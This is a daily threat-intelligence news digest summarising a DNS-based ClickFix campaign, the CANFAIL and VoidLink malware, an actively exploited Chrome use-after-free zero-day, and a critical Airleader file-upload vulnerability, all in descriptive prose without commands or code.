Cyware Daily Threat Intelligence, February 16, 2026

The persistent ClickFix threat has found a stealthy new staging ground: the DNS. By tricking users into running a simple nslookup command, attackers are now bypassing traditional web filters to pull malicious PowerShell scripts directly from DNS TXT records. This clever pivot allows the ModeloRAT to slip into networks disguised as routine name resolution traffic.

A formidable new threat actor, UAT-9921, has unveiled VoidLink, a modular malware framework that marks a turning point in AI-assisted development. Designed for long-term espionage in Linux cloud environments, the framework features an "on-demand" plugin system that allows it to adapt its weaponry in real-time.

Google has kicked off 2026 with an emergency update to neutralize CVE-2026-2441, a critical zero-day vulnerability already being weaponized in the wild. The flaw, a "use-after-free" bug within the browser’s CSS engine, allows attackers to hijack a user’s session through a single malicious webpage.

Top Malware Reported in the Last 24 Hours

New ClickFix attack exploits DNS for malware

A new variant of the ClickFix attack utilizes DNS queries to deliver malicious PowerShell payloads, marking a significant evolution in social engineering tactics. Victims are tricked into executing a custom `nslookup` command that queries an attacker-controlled DNS server. This command returns a response containing a PowerShell script, which is executed on the victim's device to install malware. The attack subsequently downloads additional malicious components, including a remote access trojan known as ModeloRAT, allowing attackers to control compromised systems. Unlike previous ClickFix methods that relied on HTTP for payload delivery, this technique blends in with normal DNS traffic, enabling attackers to modify payloads dynamically. 

Google links Russian actor to CANFAIL malware

A previously undocumented threat actor, potentially linked to Russian intelligence, has been attributed to malware attacks targeting Ukrainian organizations, particularly in defense, military, government, and energy sectors. This group has also shown interest in aerospace and manufacturing companies connected to military operations, as well as humanitarian organizations in Ukraine. Utilizing LLMs, the actor conducts reconnaissance and social engineering, enhancing their technical capabilities. Recent phishing campaigns involved impersonating legitimate Ukrainian energy entities and embedding CANFAIL malware within RAR archives disguised as PDF files. The CANFAIL malware executes a PowerShell script that downloads additional malicious components while displaying a fake error message to victims. This threat actor is also connected to the PhantomCaptcha campaign, which targets organizations involved in Ukraine's war relief efforts through deceptive phishing tactics.

UAT-9921 deploys new VoidLink malware

A previously unknown threat actor, UAT-9921, has been observed using a new modular malware framework called VoidLink to target the technology and financial sectors. This malware, documented by Cisco Talos and Check Point, is designed for long-term stealthy access to Linux-based cloud environments and is believed to have been in development since 2019. VoidLink employs multiple programming languages, including ZigLang and C, and features capabilities like compilation-on-demand for plugins and role-based access control. It allows operators to perform internal reconnaissance and lateral movement while evading detection by security solutions. Researchers noted that VoidLink's development may involve collaboration across teams, indicating a sophisticated approach to malware deployment, with evidence of its use dating back to September 2025.

Top Vulnerabilities Reported in the Last 24 Hours

Google patches first Chrome zero-day of 2026

Google has released emergency updates to address a high-severity vulnerability in Chrome, identified as CVE-2026-2441, which has been actively exploited in the wild. This zero-day flaw stems from a use-after-free vulnerability linked to an iterator invalidation bug in CSSFontFeatureValuesMap. Exploiting this vulnerability can lead to browser crashes, data corruption, and other unpredictable behaviors. Although the patch addresses the immediate issue, Google indicated that further work is necessary to fully resolve related problems. The fix has been rolled out for users on Windows, macOS, and Linux through the Stable Desktop channel. This incident marks the first zero-day vulnerability patched in Chrome for 2026.

Critical Airleader vulnerability exposes industrial systems

A critical vulnerability in Airleader Master software, tracked as CVE-2026-1358, has been revealed by CISA, posing severe risks to industrial control systems across various critical infrastructure sectors. This flaw affects versions up to 6.381 and carries a maximum CVSS score of 9.8, indicating its potential for remote code execution attacks. The vulnerability arises from an unrestricted file upload feature, allowing attackers to execute malicious files without proper validation. As a result, successful exploitation could grant attackers complete control over systems in sectors such as chemical manufacturing, energy, healthcare, and transportation.